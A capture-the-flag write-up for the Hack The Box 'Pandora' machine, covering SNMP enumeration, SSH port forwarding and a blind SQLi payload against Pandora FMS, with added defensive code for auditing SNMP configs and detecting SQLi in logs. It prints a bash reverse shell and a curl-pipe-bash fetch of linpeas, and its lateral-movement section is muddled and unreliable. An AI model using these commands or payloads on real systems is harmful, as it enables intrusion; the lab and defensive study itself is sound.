This post documents my process for solving the Pandora box on Hack The Box. The challenge focuses on recon, SNMP enumeration, port forwarding, SQLi on an internal service, and a series of lateral movement and privilege escalation steps.

Recon

Initial port scan:

# Fast full-range TCP sweep first, then a script/version scan limited to the ports found open
ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.136 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -p"$ports" -sC -sV 10.10.11.136

Open ports:

  • 22 (SSH)
  • 80 (HTTP, Apache, Ubuntu)

Enumerated with UDP scan (-sU):

  • Notably, port 161/udp (SNMP) is open.

SNMP Enumeration & Exploitation

  • SNMP (Simple Network Management Protocol) allows for device monitoring and management.
  • Used community string “public” with snmpwalk:
    snmpwalk -v1 -c public 10.10.11.136
    
  • Found credentials at the bottom of the output:
    ... = STRING: "-u daniel -p HotelBabylon23"
    

SSH in as daniel using the discovered password.
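
The defender's view of this finding, as an added example that is not part of the original writeup: a small audit of a net-snmp style snmpd.conf for community strings that would expose device data the way "public" did here. The sample config, the list of weak strings and the function names are constructed for the example, not taken from the box.

```python
"""Audit a net-snmp style snmpd.conf for community strings that would expose
device data the way the 'public' string did on this box.  Added example with
a constructed config; directive names follow net-snmp's snmpd.conf syntax."""

# Default or guessable community strings found in every SNMP wordlist.
WEAK_COMMUNITIES = {"public", "private", "community", "manager", "admin", "snmp", "cisco"}

# Constructed sample config; not the box's real /etc/snmp/snmpd.conf.
SAMPLE_SNMPD_CONF = """\
# snmpd.conf (constructed example)
sysLocation    Server room
sysContact     daniel@example.test
rocommunity public
rocommunity monitor-r0 10.0.0.0/8
rwcommunity private
com2sec readonly default public
# rocommunity disabled-example
rouser  snmpv3admin authpriv
"""


def audit_snmpd_conf(text):
    """Return findings as (line_no, directive, community, reason) tuples."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive in ("rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6"):
            # rocommunity COMMUNITY [SOURCE [OID]]; a missing SOURCE means any host
            if len(parts) < 2:
                continue
            community = parts[1]
            source = parts[2] if len(parts) > 2 else "default"
        elif directive == "com2sec":
            # com2sec NAME SOURCE COMMUNITY
            if len(parts) < 4:
                continue
            community, source = parts[3], parts[2]
        else:
            continue  # SNMPv3 users and system settings carry no community string

        reasons = []
        if community.lower() in WEAK_COMMUNITIES:
            reasons.append("default/guessable community string")
        if directive.startswith("rwcommunity"):
            reasons.append("write access protected only by a shared community string")
        if source == "default":
            reasons.append("no source restriction: any host that can reach 161/udp may query")
        for reason in reasons:
            findings.append((line_no, directive, community, reason))
    return findings


def flagged_lines(text):
    """Sorted line numbers that produced at least one finding."""
    return sorted({finding[0] for finding in audit_snmpd_conf(text)})


if __name__ == "__main__":
    for line_no, directive, community, reason in audit_snmpd_conf(SAMPLE_SNMPD_CONF):
        print(f"line {line_no}: {directive} {community!r}: {reason}")
```

Run against the constructed config it flags the three community lines (4, 6 and 7) and leaves the source-restricted read-only string and the SNMPv3 user alone; the write-community line collects three separate reasons, which is the one to fix first.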

Internal Web Service Access (Port Forwarding)

Found a vhost config at /etc/apache2/sites-enabled/pandora.conf, which exposes an internal site on localhost:80 (PandoraFMS).

Set up SSH port forwarding to access the site locally:

ssh -D 9090 daniel@10.10.11.136          # dynamic forward: SOCKS proxy on localhost:9090
# or, after login, open the ssh escape command line (~C) and add a local forward:
~C
ssh> -L 8000:127.0.0.1:80                # local port 8000 -> the box's internal 127.0.0.1:80

Then, with the -L forward in place, access http://localhost:8000 in your browser.

Pandora FMS - Version & SQLi

  • Internal Pandora FMS console found (v7.0NG.742_FIX_PERL2020).
  • Google for exploits; SonarSource blog highlights a SQLi in /include/chart_generator.php (session_id parameter).

Example exploit:

http://localhost:8000/pandora_console/include/chart_generator.php?session_id=1' OR IF((NOW()=SYSDATE()),SLEEP(10),1)='0

  • Confirmed time-based blind SQLi: the response only comes back after the SLEEP() delay when the injected condition is true.

Enumerated tables/users via SQLi (or using sqlmap):

  • Dumped session and user tables.
  • Found hash for user matt.
  • Used valid session from tsessions_php to gain console access.
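
To make the root cause concrete, here is an added example (mine, not Pandora FMS code) showing a session lookup written with string concatenation next to the parameterised form. It uses an in-memory SQLite table loosely modelled on the tsessions_php table named above; the columns, rows and function names are constructed, and because SQLite has no SLEEP() the probe is a plain tautology rather than the time-based payload from the writeup.

```python
"""Vulnerable vs. parameterised session lookup.  Added example, not Pandora FMS
code: an in-memory SQLite table loosely modelled on a tsessions_php table,
with constructed rows.  SQLite has no SLEEP(), so the probe is a tautology
rather than the time-based payload used against the real console."""
import sqlite3


def build_db():
    """Create the constructed session table (two sessions, two users)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tsessions_php ("
        "id_session TEXT PRIMARY KEY, data TEXT, last_active INTEGER)"
    )
    conn.executemany(
        "INSERT INTO tsessions_php VALUES (?, ?, ?)",
        [
            ("abc123", 'id_usuario|s:4:"matt";', 1700000000),
            ("def456", 'id_usuario|s:5:"admin";', 1700000100),
        ],
    )
    return conn


def lookup_vulnerable(conn, session_id):
    """Builds the query by string concatenation, so a quote in session_id
    ends the literal and whatever follows is parsed as SQL."""
    query = (
        "SELECT id_session, data FROM tsessions_php "
        f"WHERE id_session = '{session_id}'"
    )
    return conn.execute(query).fetchone()


def lookup_safe(conn, session_id):
    """Binds session_id as a parameter: it is only ever compared as data."""
    query = "SELECT id_session, data FROM tsessions_php WHERE id_session = ?"
    return conn.execute(query, (session_id,)).fetchone()


def compare(session_id):
    """Run both lookups on the same input; returns (vulnerable_row, safe_row).
    A malformed quote makes the concatenated query fail outright, which is
    the error a blind-SQLi probe first looks for."""
    conn = build_db()
    try:
        try:
            vulnerable = lookup_vulnerable(conn, session_id)
        except sqlite3.Error as exc:
            vulnerable = f"SQL error: {exc}"
        return vulnerable, lookup_safe(conn, session_id)
    finally:
        conn.close()


if __name__ == "__main__":
    print("legitimate id :", compare("abc123"))
    print("stray quote   :", compare("abc123'"))
    print("tautology     :", compare("nosuch' OR '1'='1"))
```

The parameterised lookup returns the same row for the real id, nothing for the tautology, and no error for the stray quote; the concatenated one returns a session that was never requested, which is exactly what lets a foreign session id turn into console access.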

Lateral Movement & PE

  • Examined log and config files (e.g., /var/www/pandora/pandora_console/audit.log).
  • Found clues in /etc/apache2/sites-enabled/pandora.conf and Windows shares (via telnet).
  • Discovered password for “security” account from a mailbox: 4Cc3ssC0ntr0ller.

Connected to telnet server with new credentials and escalated to get the user flag.

Useful Commands & Resources

  • Reverse shell (run on the target, pointed at the attacker box):
    bash -c 'bash -i >& /dev/tcp/10.10.14.6/9001 0>&1'
  • Download and run linpeas.sh:
    python3 -m http.server 8001                # serve from the attacker box first
    curl 10.10.14.6:8001/linpeas.sh | bash     # then fetch and run on the target
    
  • SQLi enumeration and exploitation with sqlmap.

Lessons Learned

  • SNMP remains a critical vector; always check for default credentials (“public”).
  • Don’t overlook UDP ports!
  • SSH port forwarding is a must-know skill for accessing internal services.
  • SQLi and session hijacking can give deep access to internal apps.
  • Lateral movement and mailbox hunting can reveal passwords for additional services and PE.
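
From the defender's side of the SQLi lesson, an added example (not from the original writeup) that scans Apache access-log lines for the kind of injected session_id sent to chart_generator.php above. The log lines, IPs, timestamps and marker regex are constructed for the example.

```python
"""Flag web-server requests whose query-string values carry blind-SQLi markers,
such as the injected session_id sent to chart_generator.php.  Added example
over constructed Apache combined-format log lines (IPs, times and requests
are made up for the example)."""
import re
from urllib.parse import parse_qsl, urlsplit

SAMPLE_ACCESS_LOG = """\
10.10.14.6 - - [10/Jan/2022:12:00:01 +0000] "GET /pandora_console/include/chart_generator.php?session_id=1%27%20OR%20IF%28%28NOW%28%29%3DSYSDATE%28%29%29%2CSLEEP%2810%29%2C1%29%3D%270 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.6 - - [10/Jan/2022:12:00:20 +0000] "GET /pandora_console/include/chart_generator.php?session_id=abcdef0123456789 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.10.14.6 - - [10/Jan/2022:12:00:25 +0000] "GET /pandora_console/index.php?sec=view&color=red HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
10.10.14.6 - - [10/Jan/2022:12:00:31 +0000] "GET /pandora_console/include/chart_generator.php?session_id=x%27%20AND%20BENCHMARK%285000000%2CMD5%281%29%29--%20 HTTP/1.1" 200 512 "-" "sqlmap/1.6"
"""

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Syntax that belongs in SQL, never in a session identifier: timing functions
# (SLEEP, BENCHMARK, SYSDATE/NOW), a quote followed by a boolean operator,
# or a trailing comment marker.
SQLI_MARKERS = re.compile(
    r"(?i)\b(?:sleep|benchmark|sysdate|now)\s*\("
    r"|'\s*(?:or|and)\b"
    r"|(?:--|#|/\*)\s*$"
)


def is_suspicious(value):
    """True when a decoded parameter value contains a blind-SQLi marker."""
    return SQLI_MARKERS.search(value) is not None


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_access_log(text):
    """Return one finding per suspicious parameter value, in log order."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        parts = urlsplit(entry["target"])
        # parse_qsl percent-decodes and turns '+' into spaces for us
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            if is_suspicious(value):
                findings.append({
                    "ip": entry["ip"], "ts": entry["ts"], "status": entry["status"],
                    "path": parts.path, "param": param, "value": value,
                    "ua": entry["ua"],
                })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{f['ts']} {f['ip']} {f['path']} {f['param']}={f['value']!r} ua={f['ua']}")
```

On the constructed lines it reports the two probing requests and not the legitimate session id or the unrelated index.php hit; matching on the decoded value rather than the raw URL is what keeps percent-encoded payloads from slipping past the patterns.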

Writeup based on my exploitation process and key references from the security community.